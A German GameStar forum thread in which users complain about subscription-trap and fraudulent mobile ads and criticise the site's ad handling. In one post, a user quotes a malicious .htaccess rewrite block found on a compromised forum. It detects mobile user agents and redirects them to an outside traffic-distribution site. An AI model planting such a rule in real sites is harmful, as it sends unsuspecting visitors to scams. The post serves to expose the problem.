Werbung schließt automatisch Abo ab

Dieses Thema im Forum "Fragen zur Website" wurde erstellt von Neew, 10. November 2015.

  1. badtaste21

    badtaste21
    Registriert seit:
    20. August 2011
    Beiträge:
    17.827
    Das denke ich eher nicht Wolfpig, denn wenn man mal schaut welche Seiten damals betroffen waren stellt man fest das es sich vor allem um Seiten handelt die wie Gamestar jetzt auch zunehmend offensichtlich unseriöse oder betrügerische Werbung schalten. (Focus online war darunter, ich glaube auch Bild u. RTL usw.)

    Gemeint ist solcher Quatsch wie "475€ am Tag verdienen mit diesem einfachen Trick" und Co. Wo solche Werbung geschaltet wird gehe ich immer davon aus das die Sicherheit der Nutzer dem Betreiber weitestgehend scheißegal ist, weil er Werbeeinnahmen über alles stellt, andernfalls würde man Kriminellen keine Plattform bieten.

    Selbstverständlich wird es nie ein Nullrisiko geben, aber man muss es ja auch nicht gerade herausfordern mit derartiger Werbung.
     
  2. Dre

    Dre
    Registriert seit:
    21. August 2006
    Beiträge:
    1.775
    Ich war mal so lieb und habe Herrn John (CEO) angeschrieben, damit das Problem um die Abofalle und der verschossenen Werbung endlich mal angenommen wird :yes:

    Den Verantwortlichen hier kann man nicht mehr glauben:no:
     
  3. Wolfpig

    Wolfpig
    Registriert seit:
    14. Dezember 2004
    Beiträge:
    41.296
    Dir ist bewusst das letzteres Problem ja scheinbar erst seit kurzem besteht?
    Wenn das absicht ist (was ich nicht glaube) dann rate mal von wo das kommt ;)
     
  4. electric Ein M-A-S-S-I-V

    electric
    Registriert seit:
    25. Februar 2006
    Beiträge:
    32.782
    Ort:
    Mystery Babylon
    Im übrigen ist wieder irgendwas online. Bei mir kam auf meinem Handy ein Pop up, als ich die GS News gelesen habe, dass mein Whats app abläuft und ich was anklicken soll (was nicht der Fall ist). War auch nur auf der GS Seite. Dementsprechend wird die Seite wohl ab sofort gemieden mitm Handy.

    Die Frage ist, kann da jetzt was passiert sein? Hab nicht draufgeklickt, sondern die Seiten sofort geschlossen.
     
    Zuletzt bearbeitet: 18. November 2015
  5. Cromani

    Cromani
    Registriert seit:
    18. Mai 2015
    Beiträge:
    9
    Gut, dass ich schon seit längerem uBlock Origin einsetze (Blockt die Werbung auf gamestar.de vollständig im Gegensatz zu AdBlock Plus). Und gut, dass es uBlock Origin auch für mobile Browser gibt und es dank der hohen Effizienz kaum die Leistung beeinträchtigt. Dass es solche Handy-Abzockfallen gibt, war mir bekannt. Dass diese schon aus dem Browser heraus zuschnappen können, ist mir aber neu.

    Von daher: Danke für die Warnung! In Zukunft werde ich in meinem Bekanntenkreis wieder verstärkt auf Werbeblocker, auch für mobile Browser und dabei speziell auf uBlock Origin hinweisen - und dann auf diesen Thread verweisen.

    P.S. Über diesen Satz komme ich immer noch nicht hinweg:
    Lol, das ist das absolute Eingeständnis, dass ihr keinerlei Kontrolle über eure Seite habt. Wenn demnächst hier Werbung für den IS gemacht würde (wäre ja nicht völlig ausgeschlossen...), dann habt ihr also auch keine Möglichkeiten, dagegen vorzugehen? Dann muss man eure Seite ja schon als gemeingefährlich einstufen...
     
  6. Sowas kenne ich eher von höchst unseriösen Seiten, die ich schnell wegklicke.
    Wenn hier demnächst irgendwelche Monsterschwänze und "Feuchte Muschis aus deiner Nachbarschaft. Willst du Yasmin so richtig hart ******" PopUps auf dem Bildschirm aufploppen, dann wird es aber schwer mit Ausreden ala "wir haben da keinen Einfluss darauf". Dann könnt ihr die Seite hier direkt dicht machen
     
  7. Timber.wulf Unsterblicher Forengott Moderator

    Timber.wulf
    Registriert seit:
    30. Juni 2003
    Beiträge:
    99.994
    Mein RIG:
    CPU:
    Intel 486 DX2 66 MHz
    Grafikkarte:
    V7-Mercury P-64
    RAM:
    8 MB
    Betriebssystem:
    MS-DOS
    Könnt ihr euch bitte mal um die betrügerische Werbung auf eurer Website kümmern?

    Verstehen Sie bitte, dass ich darauf keine Antwort geben möchte. Ein Teil dieser Antworten würde die User verunsichern.


    Hättet ihr euch mal an de Maizière gehalten, das wäre noch ertragreicher gewesen. :wahn:
     
  8. Husky666 Mit Schleife

    Husky666
    Registriert seit:
    18. Oktober 2010
    Beiträge:
    21.977
    Wieso? Werbung für IS halte ich für seriöser als dieses "Verdiene 1 Fantastiliarden Reichsmark pro hunderstel Sekunde mit diesem einfachen Trick!" Zudem zahlt IS sicher gut

    :ugly:

    Dieses "da können wir nichts dran tun" ist eine absolute Bankrotterklärung. Wenn ich das meinen Kunden hier sagen würde...
     
  9. Lurtz lost

    Lurtz
    Registriert seit:
    22. Juli 2005
    Beiträge:
    80.562
    Liebes SalesTeam, ich würde euch mal sehr empfehlen die "Amateure" von Computerbase nach ihrem Vermarkter zu befragen, da funktioniert das mit der Werbung nämlich. Und die können euch sicher auch erklären wie man die Werbung technisch vernünftig umsetzt. In diesem Artikel gibts schon mal ein paar Anregungen:
    http://www.computerbase.de/2015-11/computerbase-anzeigen-ladezeit/

    :) :rolleyes:
     
  10. KlausigerKlaus

    KlausigerKlaus
    Registriert seit:
    31. März 2013
    Beiträge:
    672
    Eure Partner, die die Werbeblöcke versteigern schaffen es doch auch, pornografische Werbung von Geboten auszuschließen.
    Ist es technisch nicht möglich, eine solche Abofalle von Geboten auszuschließen oder woran liegt das? Wenn Ihr schon in großen Teilen keinen Einfluss auf den Inhalt einzelner Werbeblöcke mehr habt, muss es doch möglich sein, den dafür zuständigen Partnern strengere Auflagen zu erteilen.
    Da muss der Faktor Seriösität und Sicherheit vor "etwas mehr Geld pro Werbeblock" gehen. Speziell der Smartphonemarkt ist im Moment Ziel solcher Krimineller und neben der Ermahnung, dass wir Nutzer uns besser schützen sollten gehört eben auch die eigene Arbeit, alles Mögliche zur Seitensicherheit zu gewährleisten.
     
  11. Wolfpig

    Wolfpig
    Registriert seit:
    14. Dezember 2004
    Beiträge:
    41.296
    Wie die schon geschrieben haben, es ist ja nichts was man (hoffentlich) absichtlich will, es ist scheinbar nur extrem schwer zu kontrollieren ob sich in der Anzeige entsprechender Code befindet, da der nochmal extern von der Werbung über 3. Seiten nachgeladen wird, und nicht unbedingt in dem zu sehen ist was die die ihre Werbung schalten wollen einreichen.

    Wobei ich nicht weiß wie weit die Vermarkter das eigentlich kontrollieren....wenn es extrem gründlich wäre würde so etwas vermutlich nicht durchkommen.
     
  12. captain_drink

    captain_drink
    Registriert seit:
    5. Oktober 2004
    Beiträge:
    7.403
    Nicht nur in Bezug auf die Implementierung der Werbung, sondern hinsichtlich der Usability der ganzen Seite (lokal/mobil) und ihrer Stabilität ist die Computerbase'sche Gamestar.de um Lichtjahre voraus. So weit, dass man zu fragen geneigt ist, ob dort etwa die fähigeren Leute am Werk sind.
     
  13. Dre

    Dre
    Registriert seit:
    21. August 2006
    Beiträge:
    1.775
    Ist doch kein Geheimnis mehr, dass die Redaktion top ist, die IT und Online Verantwortlichen aus Azubis besteht ;) die Diskrepanz zwischen Redaktion und dem Rest ist selbst für Kunden spürbar. Was ebenso eine Bankrotterklärung ist.
     
  14. Husky666 Mit Schleife

    Husky666
    Registriert seit:
    18. Oktober 2010
    Beiträge:
    21.977
    Wobei das noch altlasten aus dem damals völlig missglückten IDG Relaunch ist, theoretisch müsste die ganze Seite nicht nur entkernt werden sondern gesprengt und komplett neu gebaut werden. Das ist aber elendig teuer...
     
  15. semi kolon

    semi kolon
    Registriert seit:
    24. Mai 2003
    Beiträge:
    502
    Mich würde jetzt schon mal eins verbindlich interessieren:

    War diese Auto-abo-Abschluss-Werbung jetzt wirklich nur ein "Versehen" oder ist das nun eine neue Werbeform die auf GameStar.de wiederholt auftreten wird?
     
  16. OscarMayer2

    OscarMayer2
    Registriert seit:
    13. April 2012
    Beiträge:
    5.981
    Wenn ein entsprechender Abofallen-Anbieter im Ad-Exchange Gerangel das höchste Gebot abgibt, kann und wird dir diese Art von Werbung erneut angezeigt werden. Du kannst bei ebay ja auch nicht steuern wer auf deine Auktion bietet, auch wenn der Bieter 60% negative Bewertungen hat.
     
  17. badtaste21

    badtaste21
    Registriert seit:
    20. August 2011
    Beiträge:
    17.827
    Das hält auch auf anderen Seiten Einzug, von eigentlich noch als seriös geltenden Webseiten bis hin zu unseriösen wie diversen Pornseiten, Bild, RTL und Co. . Das kann also immer wieder vorkommen solange man nicht grundlegend und konkret selektiert (bspw. nur Werbung für Produkte, Firmen oder Diensleistungen die man als seriös verifizieren kann). Mein Verdacht geht nämlich dahin das unseriöse Werbung (wie alberne Renditeversprechen, Wochenverdienste und Co.) solche unseriösen Methoden anzieht. Aber das ist ja bestimmt vollkommen abwegig... :tdv:

    Im Allgemeinen würde ich jetzt nicht sagen dass das Absicht ist, deswegen wird sowas auch nicht ständig vorkommen, nur finde ich die Reaktion seitens Gamestar völlig daneben, weil es letztlich kriminell ist was da abgeht und die Verantwortung dafür was hier auf der Seite passiert einzig und allein Gamestar obliegt. Würde ein Ladenbesitzer der von seinen Kunden darauf hingewiesen wird das sich Trickbetrüger als Angestellte ausgeben und Leute abzocken auch hinstellen und sagen "tja, da müssen sie zur Polizei, da sind mir die Hände gebunden" - ne, der würde vermutlich selbst die Polizei rufen oder einen Privatermittler engagieren um dem Treiben ein Ende zu setzen weil es seienn Ruf schädigen würde wenn er nicht entsprechend reagiert.

    Ein Wirt der ein Gasthaus betreibt kann seinen Gästen auch nicht sagen das sie mit Randalierern selbst fertig werden müssen oder die Schnecken im Salat leider mal vorkommen können bei Naturprodukten :ugly:, sonst kommt doch mit der Zeit keiner mehr... daher zweifle ich an der Ernsthaftigkeit mit der das Sales Team an die Sache rangehen will wenn man einerseits sagt wir können eh nichts dagegen machen und andererseits so tut als prüfe man Möglichkeiten dagegen vorzugehen. Denn am Ende wird es doch so sein wie immer. Wenn hier erstmal alles ausdiskutiert ist und sich alles gelegt hat hört man nie wieder was vom Sales Team in der Sache. Oder ist meine Annahme so falsch dass das hier alles mal wieder nur als Sturm im Wasserglas aufgefasst wird, weil es den Verantwortlichen letztlich sowieso egal ist? :fs:
     
  18. das_opa Aushilfs Student

    das_opa
    Registriert seit:
    24. September 2004
    Beiträge:
    45.888
    Ort:
    pseudo-intälligentz gesegnet
    Wenn der Gastwirt versichert und es ernst meint das er sein bestmöglichstes gibt, ist das am Ende auch fast egal wenn es mal passiert.
    Aber weder ist die GS eine Gaststube wo es "mal" passiert noch kann man den Gastwirt ernstnehmen wenn er etwas sagt
     
  19. HAL9000

    HAL9000
    Registriert seit:
    31. Januar 2012
    Beiträge:
    359
    Zu erklären, dass man praktisch keine Kontrolle über die Werbung hat, die auf der eigenen Seite ausgeliefert wird, ist eine Bankrotterklärung.
    Wer jetzt tatsächlich noch ohne Adblocker unterwegs ist, tut mir leid. Das Aufrufen von Webseiten hat grundsätzlich mit Vertrauen zu tun. Den Adblocker auszuschalten setzt noch mehr Vertrauen voraus. Wer dann nicht guten Gewissens sagen kann, alles daran zu setzen, dass so etwas nicht passiert, der verdient das Vertrauen nicht. Ganz einfach.
    Ich zahle für GS, weil mir die Inhalte es wert sind aber ich bin auch mal mobil unterwegs und nicht eingeloggt. Muss ich mir dann wirklich Gedanken machen, dass mir über Eure Seite irgendein malicious content untergejubelt wird, der eine Schwachstelle in meinem Smartphone ausnutzt?
    Ja, mir ist klar, dass man mit allem rechnen muss, aber wenn GS als seriöse Seite gesehen werden möchte, dann ist es Eure Pflicht, alle Hebel in Bewegung zu setzen, um Eure User zu schützen insbesondere, wenn Ihr wollt, dass die Seite ohne Adverhüterli besucht wird.
     
  20. fuzzykiller Der Forentroll schlechthin

    fuzzykiller
    Registriert seit:
    27. Dezember 2003
    Beiträge:
    54.268
    Wenn man beim aktuellen Werbebroker Probleme damit hat, das ständig unseriöse oder sogar bösartige Werbung geschaltet wird, sucht man sich halt einen neuen. :nixblick:
     
  21. badtaste21

    badtaste21
    Registriert seit:
    20. August 2011
    Beiträge:
    17.827
    Das setzt nur voraus das man es auch als Problem erkennt und nicht als dringend notwendige Einnahmequelle erachtet.
     
  22. HAL9000

    HAL9000
    Registriert seit:
    31. Januar 2012
    Beiträge:
    359
    Tja, irgendwann hat dann aber auch der Letzte kapiert, dass ein Besuch der Gamestar ohne Adblock keine gute Idee ist und dann? Kommen dann wieder Fair-Use-Aufrufe? Mit Bezahlschranke alleine wird sich die Seite mit der derzeitigen Belegschaft auf Dauer wohl nicht halten können.

    Aber an dem reichhaltigen Feedback dieses Threads kann man schon ablesen, dass Deine Vermutung wohl in die richtige Richtung geht...
     
  23. das_opa Aushilfs Student

    das_opa
    Registriert seit:
    24. September 2004
    Beiträge:
    45.888
    Ort:
    pseudo-intälligentz gesegnet
    vllt sollte man Markus(?) nochmal vor die Feedback Kamera ziehen und nachfragen ob er sich das so vorgestellt hat bzw was sein Resumee der letzten Monate so ost :yes:
     
  24. Hektor Hernandez

    Hektor Hernandez
    Registriert seit:
    28. Juli 2014
    Beiträge:
    4.943
    Faire Werbung.
     
  25. badtaste21

    badtaste21
    Registriert seit:
    20. August 2011
    Beiträge:
    17.827
    Absolut, dazu ist die kostenlose Konkurrenz zu groß und es gibt dann doch zu wenig interesanten, eigenen Content der mich bei einem Abo interessieren würde.

    Zumindest was er dazu sagt das Gamestar seit einiger Zeit Kriminellen und Betrügern eine Plattform bietet (und wer die Bezeichnung für übertrieben hält soll sich mal fragen wie rechtschaffen Angebote zu 8000 € Monatsverdienst und 20% Rendite wirklich sein können) sowie eine Einschätzung zum Vorfall der hier im Thread beschrieben wird wäre durchaus interessant.

    Ansonsten kann man sich das Video vom letzten Jahr anschauen, wo man letztlich auch schon sagte das Gamestar den Werbepartnern hilflos ausgeliefert ist und nichts tun will... äh, kann außer zuzuschauen - sinngemäß jedenfalls. www.gamestar.de/videos/specials,20/feedback,75072.html (ab der 12. Minute etwa) Die "Ideallösung Premiumabo" kam natürlich damals schon auf.

    Zitat Markus Schwerdtel damals: "Ich glaube es wird eher auf lange Sicht noch schlimmer." (ziemlich gegen Ende des Videos) Das war immerhin realistisch gedacht. :ugly:
     
    Zuletzt bearbeitet: 21. November 2015
  26. das_opa Aushilfs Student

    das_opa
    Registriert seit:
    24. September 2004
    Beiträge:
    45.888
    Ort:
    pseudo-intälligentz gesegnet
    Er wusste halt wohin die Reise geht. Alles geplant

    €: Wenn der Agentur Klicks wichtig sind, sollten die doch hinterher sein das die GS Seite funktioniert und nicht dauernd kaputt geht. Vielleicht sollte man andersherum das Pferd zügeln und den Agenturen stecken das das hier nicht funktioniert und dann lassen sie es ganz freiwllig sein :leuchte:
     
    Zuletzt bearbeitet: 21. November 2015
  27. Timber.wulf Unsterblicher Forengott Moderator

    Timber.wulf
    Registriert seit:
    30. Juni 2003
    Beiträge:
    99.994
    Mein RIG:
    CPU:
    Intel 486 DX2 66 MHz
    Grafikkarte:
    V7-Mercury P-64
    RAM:
    8 MB
    Betriebssystem:
    MS-DOS
    Der hat schon lange den Stab weiter gereicht, meine ich. :topmodel:
     
  28. badtaste21

    badtaste21
    Registriert seit:
    20. August 2011
    Beiträge:
    17.827
    Ich fürchte der Plan geht nicht auf, weil ich es schon oft hatte das die Werbung bspw. vor einem Video geht und das Video danach nicht. Aktuelles Beispiel ist die News vom 16.11 - den Fehler habe ich ordnungsgemäß bereits am 17.11 im entsprechenden Unterforum gemeldet, nachdem klar war das es noch/wieder defekt ist, aber bis Ende der Woche wurde es weder gefixt noch hätte sich überhaupt jemand darauf gemeldet. (okay, 720p geht wohl sporadisch, 1080p nach wie vor nicht)

    Währenddessen hat Gamestar immerhin das Geld für die Werbung eingestrichen die vor dem Video geschaltet war und von ein paar Tausend Leuten gesehen wurde, ohne das sie anschließend in den Genuss des Videos kamen. Das werden jetzt keine Unsummen an Einnahmen gewesen sein und ist auch nur speziell dieses Video (obwohl es wie gesagt häufiger vorkommt) - dennoch geht so das altbekannte "Fair-Play" halt auch nicht. :ugly:

    Kurzum: Selbst defekte Werbung funktioniert ja meistens noch gut genug um dafür die Klicks einzustreichen und den Werbepartnern wird es egal sein wie das am Ende aussieht und ob es die Seite lahmlegt. In den meisten Fällen denke ich das die Werbetreibenden dafür auch nicht so richtig was können, denn andernfalls wäre das ja bei anderen Seiten auch so wo deren Werbung geschaltet wird und ich denke es würde auffallen wenn eine bestimmte Werbung das halbe Internet lahmlegt.

    Wem du es also stecken müsstest wäre wohl nicht den Werbeagenturen und Brokern, sondern denen die die Werbung schalten, also bspw. Toyota, Bethesda usw. - und dort wird es den Verantwortlichen vermutlich auch egal sein ob ihre Werbung auf einer Seite wie Gamestar nicht hundertprozentig läuft, wenn sie diese Mitteilung von zig anderen Seiten nicht bekommen.

    Das würde mich überhaupt nicht wundern wenn man das nicht mal mitbekommen hätte.

    Hätte ich auch nur irgendwas zu sagen hätte ich sowieso längst mal eine Seite eingerichtet auf der man ständig die aktuelle Besetzung und die Funktionen des Einzelnen einsehen kann und wo sich jeder der möchte (auch wenn es natürlich Sinn der Sache wäre das es jeder macht) mit Bild und kleinem Spruch kurz vorstellen kann, evtl. nur in Kurzform seine Motivation mitteilt und was er erreichen möchte. Ich habe das an verschiedener Stelle bestimmt schon zig mal vorgeschlagen, aber noch nicht einmal eine Antwort erhalten wieso das nicht gemacht wird. :( Aber hätte, hätte, Fahrradkette...

    IDG hatte sowas in der Art, wurde aber auch nicht gepflegt. Die haben es gerade mal geschafft den Reiter raus zu nehmen als sie Gamestar vekrauft haben, davor hatte das jahrelang längst schon keinen mehr interessiert bei IDG, sodass noch Leute in Positionen standen die de facto nicht mal mehr bei IDG beschäftigt waren. :ugly:
     
    Zuletzt bearbeitet: 21. November 2015
  29. das_opa Aushilfs Student

    das_opa
    Registriert seit:
    24. September 2004
    Beiträge:
    45.888
    Ort:
    pseudo-intälligentz gesegnet
  30. Lurtz lost

    Lurtz
    Registriert seit:
    22. Juli 2005
    Beiträge:
    80.562
    Deine Mudda kauft kaputte Werbeanzeigen für gamestar.de :muhaha: :ugly:
     
  31. badtaste21

    badtaste21
    Registriert seit:
    20. August 2011
    Beiträge:
    17.827
    Ja, schon sowas in der Art, nur eben etwas wo sich jeder auch ein bisschen vorstellen kann (d.h. wo die genaue Berufsbezeichnung auch erklärt wird, also xy ist für Werbung und Abos zuständig, wobei es natürlich bei Video oder ähnlichem klar ist), ein Bild dazu (die meisten haben ja sowieso ein Bild von sich das für Artikel und Videos bereits verwendet wird), mit direkter Anschrift ihrer Gamestar Mail und das alles nicht so versteckt irgendwo ganz unten an der Seite im Kleingedruckten neben dem Impressum, sondern vielleicht im Bereich "Community" oder sogar als eigener Reiter daneben z.B. "die Redaktion" (oder was anderes damit man es nicht mit der videoreihe verwechselt). :nixblick:

    Man könnte mir zumindest mal sagen warum man das nicht machen will oder die Idee blöd findet.

    :ugly::hoch:
     
  32. Vögelchen Baumwolldealer des Vertrauens

    Vögelchen
    Registriert seit:
    13. Januar 2005
    Beiträge:
    82.010
    Hm, Yassin ist inzwischen Portal Management. Was auch immer das genau ist, aber Gamestar.de dürfte das Portal sein, oder? :ugly:

    Dem könnte ich ja Montag mal bei Skype schreiben, vermutlich ist die tolle Antwort des Sales-Teams ja gar nicht allen bekannt.
     
  33. Timber.wulf Unsterblicher Forengott Moderator

    Timber.wulf
    Registriert seit:
    30. Juni 2003
    Beiträge:
    99.994
    Mein RIG:
    CPU:
    Intel 486 DX2 66 MHz
    Grafikkarte:
    V7-Mercury P-64
    RAM:
    8 MB
    Betriebssystem:
    MS-DOS
    Naja, wir haben tatsächlich einen neuen Ansprechpartner, schon seit einiger Zeit. Wie das sonst aussieht, weiß ich leider auch nicht.
     
  34. fuzzykiller Der Forentroll schlechthin

    fuzzykiller
    Registriert seit:
    27. Dezember 2003
    Beiträge:
    54.268
    Durch Zufall habe ich das nun auf einer anderen Seite gesehen und kann sagen, dass das ein ganz krasser Fall ist. In meinem Fall geht es um ein vBulletin-Forum. Dort wurde, vermutlich von einem SEO-Plugin oder durch einem Exploit, in der .htaccess folgendes eingetragen:
    Code:
    RewriteEngine On
    RewriteBase /
    RewriteCond %{HTTP_USER_AGENT} android|bb\d+|meego|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|i
    ris|kindle|lge\ |maemo|midp|mmp|mobile.+firefox|netfront|opera\ m(ob|in)i|palm(\ os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)
    0|symbian|treo|up\.(browser|link)|vodafone|wap|windows\ ce|xda|xiino [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a\ wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(e
    x|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r\ |s\ )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccw
    a|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|e
    sl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1\ u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp(\ i|i
    p)|hs\-c|ht(c(\-|\ |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac(\ |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|
    jemu|jigs|kddi|keji|kgt(\ |\/)|klon|kpt\ |kwc\-|kyo(c|k)|le(no|xi)|lg(\ g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui
    |xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-|\ |o|v)|zz)|mt(50|p1|v\ )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0
    |2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))
    |phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|
    sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|
    ny)|sp(01|h\-|v\-|v\ )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up
    (\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-|\ )|webc|whit|wi(g
    \ |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-) [NC]
    RewriteRule ^$ http://luxurytds.com/go.php?sid=1 [R,L]
    
    Wie man sieht werden gezielt mobile Geräte manipuliert. Die Benutzer werden dann auf zufällige „Werbepartner“ weitergeleitet, das ist manchmal nur der Play Store, manchmal das in diesem Thread genannte, manchmal „Sie wurden ausgewählt“-Scheiß.
    Wo es herkommt habe ich noch nicht so ganz rausgefunden.
     
    Zuletzt bearbeitet: 22. November 2015
  35. Tamasuke gesperrter Benutzer

    Tamasuke
    Registriert seit:
    5. August 2008
    Beiträge:
    1.841
    Was grad auch extremst nervt ist die Tribute von Panem Werbung.. Man will einen kommentar posten oder etwas liken... klickt auf den "absenden button" und wird weitergeleitet auf die werbeseite.

    Euer Werbekunde wird sich freuen. Tausende Clicks aber keine Conversions (sales), weil man nicht beabsichtigt auf die Werbefläche klickt.

    Ihr kassiert schön für die Klicks und der Kunde zahlt mehr drauf ohne, dass der Click in einen kauf konvertiert wird. ist natürlich auch ne Methode.

    Und uns Leser nervt es einfach nur.


    Aber warsch. fixt das niemand am Wochenende.
     
  36. das_opa Aushilfs Student

    das_opa
    Registriert seit:
    24. September 2004
    Beiträge:
    45.888
    Ort:
    pseudo-intälligentz gesegnet
    wer:confused:
     
  37. captain_drink

    captain_drink
    Registriert seit:
    5. Oktober 2004
    Beiträge:
    7.403
    Es hat bei Gamestar Tradition, dass sowas immer gegen Freitag auftaucht, übers Wochenende unangetastet bleibt und dann montags verschwindet. Die passende Ausrede, dass man übers Wochenende da leider nichts machen könne, liegt dann praktischerweise schon bereit.
     
  38. badtaste21

    badtaste21
    Registriert seit:
    20. August 2011
    Beiträge:
    17.827
    @fuzzykiller
    Interessanter Fund. Dürfte ja zumindest mal eine grobe Richtung vorgeben wo Gamestar zu suchen hat wenn sie wissen wollen wie sowas kommt, oder?
     
  39. Yassin Chakhchoukh

    -->

    :ugly:
     
  40. fredthefreezer

    fredthefreezer
    Registriert seit:
    20. Dezember 2005
    Beiträge:
    322
Top